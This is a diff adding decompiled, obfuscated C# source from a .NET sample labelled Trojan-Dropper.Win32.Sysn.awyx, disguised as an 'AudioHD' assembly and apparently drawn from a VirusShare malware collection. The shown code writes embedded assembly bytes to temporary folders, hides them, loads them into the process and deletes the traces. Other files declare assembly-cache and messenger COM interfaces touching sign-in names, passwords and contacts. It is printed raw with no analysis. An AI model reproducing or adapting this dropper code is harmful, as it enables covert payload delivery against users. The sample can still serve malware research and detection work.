+            {
+              string path1 = string.Format(\u0004.\u000F(541), (object) Path.GetTempPath(), (object) str1);
+              Directory.CreateDirectory(path1);
+              string path2 = path1 + obj.\u0001 + \u0004.\u000F(554);
+              if (!File.Exists(path2))
+              {
+                Assembly assembly = (Assembly) null;
+                FileStream fileStream = File.OpenWrite(path2);
+                fileStream.Write(numArray, 0, numArray.Length);
+                fileStream.Close();
+                if (\u0002.\u0002.\u000F(path2))
+                  assembly = Assembly.Load(obj.\u000F(true));
+                File.Delete(path2);
+                Directory.Delete(path1);
+                if ((object) assembly != null)
+                {
+                  lock (\u0002.\u0001.\u0001)
+                  {
+                    if (\u0002.\u0001.\u0001.ContainsKey((object) str1))
+                      assembly = (Assembly) \u0002.\u0001.\u0001[(object) str1];
+                    else
+                      \u0002.\u0001.\u0001.Add((object) str1, (object) assembly);
+                  }
+                  return assembly;
+                }
+              }
+            }
+            catch
+            {
+            }
+          }
+          Assembly assembly1 = (Assembly) null;
+          if (!flag3)
+          {
+            try
+            {
+              assembly1 = Assembly.Load(numArray);
+            }
+            catch (FileLoadException ex)
+            {
+              flag3 = true;
+            }
+            catch (BadImageFormatException ex)
+            {
+              flag3 = true;
+            }
+          }
+          if (flag3)
+          {
+            try
+            {
+              string path3 = string.Format(\u0004.\u000F(541), (object) Path.GetTempPath(), (object) str1);
+              Directory.CreateDirectory(path3);
+              string path4 = path3 + obj.\u0001 + \u0004.\u000F(554);
+              if (!File.Exists(path4))
+              {
+                FileStream fileStream = File.OpenWrite(path4);
+                fileStream.Write(numArray, 0, numArray.Length);
+                fileStream.Close();
+                \u0002.\u0001.\u000F(path4, (string) null, 4);
+                \u0002.\u0001.\u000F(path3, (string) null, 4);
+              }
+              assembly1 = Assembly.LoadFile(path4);
+            }
+            catch
+            {
+            }
+          }
+          lock (\u0002.\u0001.\u0001)
+            \u0002.\u0001.\u0001.Add((object) str1, (object) assembly1);
+          return assembly1;
+        }
+      }
+      return (Assembly) null;
+    }
+
+    internal struct \u0001
+    {
+      public string \u0001;
+      public Version \u0001;
+      public string \u0002;
+      public string \u0003;
+
+      public string \u000F([In] bool obj0)
+      {
+        StringBuilder stringBuilder = new StringBuilder();
+        stringBuilder.Append(this.\u0001);
+        if (obj0)
+        {
+          stringBuilder.Append(\u0004.\u000F(563));
+          stringBuilder.Append((object) this.\u0001);
+        }
+        stringBuilder.Append(\u0004.\u000F(580));
+        stringBuilder.Append(this.\u0002.Length == 0 ? \u0004.\u000F(597) : this.\u0002);
+        stringBuilder.Append(\u0004.\u000F(610));
+        stringBuilder.Append(this.\u0003.Length == 0 ? \u0004.\u000F(635) : this.\u0003);
+        return stringBuilder.ToString();
+      }
+
+      public \u0001([In] string obj0)
+      {
+        this.\u0001 = new Version();
+        this.\u0002 = string.Empty;
+        this.\u0003 = string.Empty;
+        this.\u0001 = string.Empty;
+        string str1 = obj0;
+        char[] chArray = new char[1]{ ',' };
+        foreach (string str2 in str1.Split(chArray))
+        {
+          string str3 = str2.Trim();
+          if (str3.StartsWith(\u0004.\u000F(644)))
+            this.\u0001 = new Version(str3.Substring(8));
+          else if (str3.StartsWith(\u0004.\u000F(657)))
+          {
+            this.\u0002 = str3.Substring(8);
+            if (this.\u0002 == \u0004.\u000F(597))
+              this.\u0002 = string.Empty;
+          }
+          else if (str3.StartsWith(\u0004.\u000F(670)))
+          {
+            this.\u0003 = str3.Substring(15);
+            if (this.\u0003 == \u0004.\u000F(635))
+              this.\u0003 = string.Empty;
+          }
+          else
+            this.\u0001 = str3;
+        }
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0002.cs

@@ -0,0 +1,174 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace \u0002
+{
+  internal sealed class \u0002
+  {
+    [DllImport("fusion", EntryPoint = "CreateAssemblyCache", CharSet = CharSet.Auto)]
+    internal static extern int \u000F(out \u0002.\u0002.\u0007 ppAsmCache, [In] uint obj1);
+
+    public static bool \u000F([In] string obj0)
+    {
+      \u0002.\u0002.\u0007 ppAsmCache = (\u0002.\u0002.\u0007) null;
+      return \u0002.\u0002.\u000F(out ppAsmCache, 0U) == 0 && ppAsmCache.\u0002(0U, obj0, IntPtr.Zero) == 0;
+    }
+
+    public struct \u0001
+    {
+      public int \u0001;
+      public int \u0002;
+    }
+
+    public struct \u0002
+    {
+      public \u0002.\u0002.\u0001 \u0001;
+      public long \u0001;
+      public Guid \u0001;
+      public \u0002.\u0002.\u0001 \u0002;
+      public int \u0001;
+      public int \u0002;
+      public int \u0003;
+      public \u0002.\u0002.\u0001 \u0003;
+      public string \u0001;
+      public int \u0004;
+      public int \u0005;
+    }
+
+    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
+    [Guid("0000000c-0000-0000-C000-000000000046")]
+    [ComImport]
+    public interface \u0003
+    {
+      void \u0001(IntPtr pv, uint cb, out uint pcbRead);
+
+      void \u0002(IntPtr pv, uint cb, out uint pcbWritten);
+
+      void \u0001(long dlibMove, uint dwOrigin, out ulong plibNewPosition);
+
+      void \u0001(ulong libNewSize);
+
+      void \u0001(\u0002.\u0002.\u0003 pstm, ulong cb, out ulong pcbRead, out ulong pcbWritten);
+
+      void \u0001(uint grfCommitFlags);
+
+      void \u0001();
+
+      void \u0001(ulong libOffset, ulong cb, uint dwLockType);
+
+      void \u0002(ulong libOffset, ulong cb, uint dwLockType);
+
+      void \u0001(out \u0002.\u0002.\u0002 pstatstg, uint grfStatFlag);
+
+      void \u0001(out \u0002.\u0002.\u0003 ppstm);
+    }
+
+    [Guid("7c23ff90-33af-11d3-95da-00a024a85b51")]
+    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
+    [ComImport]
+    internal interface \u0004
+    {
+      void \u0001(\u0002.\u0002.\u0005 pName);
+
+      void \u0001(out \u0002.\u0002.\u0005 ppName);
+
+      void \u0001([MarshalAs(UnmanagedType.LPWStr)] string szName, int pvValue, uint cbValue, uint dwFlags);
+
+      void \u0001([MarshalAs(UnmanagedType.LPWStr)] string szName, out int pvValue, ref uint pcbValue, uint dwFlags);
+
+      void \u0001(out int wzDynamicDir, ref uint pdwSize);
+    }
+
+    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
+    [Guid("CD193BC0-B4BC-11d2-9833-00C04FC31D2E")]
+    [ComImport]
+    internal interface \u0005
+    {
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(uint PropertyId, IntPtr pvProperty, uint cbProperty);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(uint PropertyId, IntPtr pvProperty, ref uint pcbProperty);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001();
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(IntPtr szDisplayName, ref uint pccDisplayName, uint dwDisplayFlags);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(
+        object refIID,
+        object pAsmBindSink,
+        \u0002.\u0002.\u0004 pApplicationContext,
+        [MarshalAs(UnmanagedType.LPWStr)] string szCodeBase,
+        long llFlags,
+        int pvReserved,
+        uint cbReserved,
+        out int ppv);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(out uint lpcwBuffer, out int pwzName);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(out uint pdwVersionHi, out uint pdwVersionLow);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(\u0002.\u0002.\u0005 pName, uint dwCmpFlags);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(out \u0002.\u0002.\u0005 pName);
+    }
+
+    [Guid("9e3aaeb4-d1cd-11d2-bab9-00c04f8eceae")]
+    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
+    [ComImport]
+    internal interface \u0006
+    {
+      void \u0001(
+        [MarshalAs(UnmanagedType.LPWStr)] string pszName,
+        uint dwFormat,
+        uint dwFlags,
+        uint dwMaxSize,
+        out \u0002.\u0002.\u0003 ppStream);
+
+      void \u0002(\u0002.\u0002.\u0005 pName);
+
+      void \u0001(uint dwFlags);
+
+      void \u0002(uint dwFlags);
+    }
+
+    [Guid("e707dcde-d1cd-11d2-bab9-00c04f8eceae")]
+    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
+    [ComImport]
+    internal interface \u0007
+    {
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName, IntPtr pvReserved, out uint pulDisposition);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName, IntPtr pAsmInfo);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(
+        uint dwFlags,
+        IntPtr pvReserved,
+        out \u0002.\u0002.\u0006 ppAsmItem,
+        [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0001(out object ppAsmScavenger);
+
+      [MethodImpl(MethodImplOptions.PreserveSig)]
+      int \u0002(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszManifestFilePath, IntPtr pvReserved);
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0003.cs

@@ -0,0 +1,25 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using System;
+
+namespace \u0002
+{
+  internal sealed class \u0003
+  {
+    public static void \u000F()
+    {
+      try
+      {
+        \u0001.\u000F();
+      }
+      catch (Exception ex)
+      {
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0004.cs

@@ -0,0 +1,114 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using \u0003;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace \u0002
+{
+  [Guid("249E2D41-44DD-4D64-9B6B-D5FD76BD85B1")]
+  [ComImport]
+  public interface \u0004
+  {
+    object Window { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    string ReceiveFileDirectory { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrAppID);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0002();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrFileName);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0003();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrPassword);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0001([MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrServiceId);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001([In] int hwndParent, [In] \u0005 MOPTIONPAGE);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrEMail);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001(
+      [In] int hwndParent,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrFirstName,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrLastName,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCity,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrState,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCountry);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [In] \u0006 ePhoneNumber, [MarshalAs(UnmanagedType.BStr), In] string bstrNumber);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001([In] int hwndParent);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    object \u0003([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0004();
+
+    object MyContacts { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    string MySigninName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    string MyFriendlyName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    \u0007 MyStatus { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [param: In] set; [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    int \u0001([In] \u0008 mFolder);
+
+    string MyServiceName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.BStr)]
+    string \u0001([In] \u0006 PhoneType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.Struct)]
+    object \u0001([In] \u0001 ePropType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void \u0001([In] \u0001 ePropType, [MarshalAs(UnmanagedType.Struct), In] object pvPropVal);
+
+    string MyServiceId { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    object Services { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0005.cs

@@ -0,0 +1,20 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0002
+{
+  internal enum \u0005
+  {
+    \u0001,
+    \u0002,
+    \u0003,
+    \u0004,
+    \u0005,
+    \u0006,
+    \u0007,
+    \u0008,
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0006.cs

@@ -0,0 +1,17 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0002
+{
+  internal enum \u0006
+  {
+    \u0001 = -1, // 0xFFFFFFFF
+    \u0002 = 0,
+    \u0003 = 1,
+    \u0004 = 2,
+    \u0005 = 3,
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0007.cs

@@ -0,0 +1,26 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0002
+{
+  internal enum \u0007
+  {
+    \u0001 = 0,
+    \u0002 = 1,
+    \u0003 = 2,
+    \u0004 = 6,
+    \u0005 = 10, // 0x0000000A
+    \u0006 = 14, // 0x0000000E
+    \u0007 = 18, // 0x00000012
+    \u0008 = 34, // 0x00000022
+    \u000E = 50, // 0x00000032
+    \u000F = 66, // 0x00000042
+    \u0010 = 256, // 0x00000100
+    \u0011 = 512, // 0x00000200
+    \u0012 = 768, // 0x00000300
+    \u0013 = 1024, // 0x00000400
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0002/_0008.cs

@@ -0,0 +1,14 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0002
+{
+  internal enum \u0008
+  {
+    \u0001,
+    \u0002,
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/Token2000075.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token2000075
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0003
+{
+  internal class Token2000075 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0001.cs

@@ -0,0 +1,16 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0003
+{
+  internal enum \u0001
+  {
+    \u0001 = -1, // 0xFFFFFFFF
+    \u0002 = 0,
+    \u0003 = 1,
+    \u0004 = 2,
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0003/_0002.cs

@@ -0,0 +1,126 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using \u0003;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace \u0003
+{
+  [Guid("7F9EE13F-A982-4FEB-B166-AE510E30F501")]
+  [ComImport]
+  public interface \u0002 : \u0004
+  {
+    new object Window { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    new string ReceiveFileDirectory { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrAppID);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0002();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact, [MarshalAs(UnmanagedType.BStr), In] string bstrFileName);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0003();
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrPassword);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.BStr), In] string bstrSigninName, [MarshalAs(UnmanagedType.BStr), In] string bstrServiceId);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent, [In] \u0005 MOPTIONPAGE);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent, [MarshalAs(UnmanagedType.BStr), In] string bstrEMail);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001(
+      [In] int hwndParent,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrFirstName,
+      [MarshalAs(UnmanagedType.BStr), In] string bstrLastName,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCity,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrState,
+      [MarshalAs(UnmanagedType.Struct), In, Optional] object vbstrCountry);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0002([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0001([MarshalAs(UnmanagedType.Struct), In] object vContact, [In] \u0006 ePhoneNumber, [MarshalAs(UnmanagedType.BStr), In] string bstrNumber);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0001([In] int hwndParent);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.IDispatch)]
+    new object \u0003([MarshalAs(UnmanagedType.Struct), In] object vContact);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new void \u0004();
+
+    new object MyContacts { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.IDispatch)] get; }
+
+    new string MySigninName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    new string MyFriendlyName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    new \u0007 MyStatus { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [param: In] set; [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    new int \u0001([In] \u0008 mFolder);
+
+    new string MyServiceName { [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)] [return: MarshalAs(UnmanagedType.BStr)] get; }
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.BStr)]
+    new string \u0001([In] \u0006 PhoneType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    [return: MarshalAs(UnmanagedType.Struct)]
+    new object \u0001([In] \u0001 ePropType);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
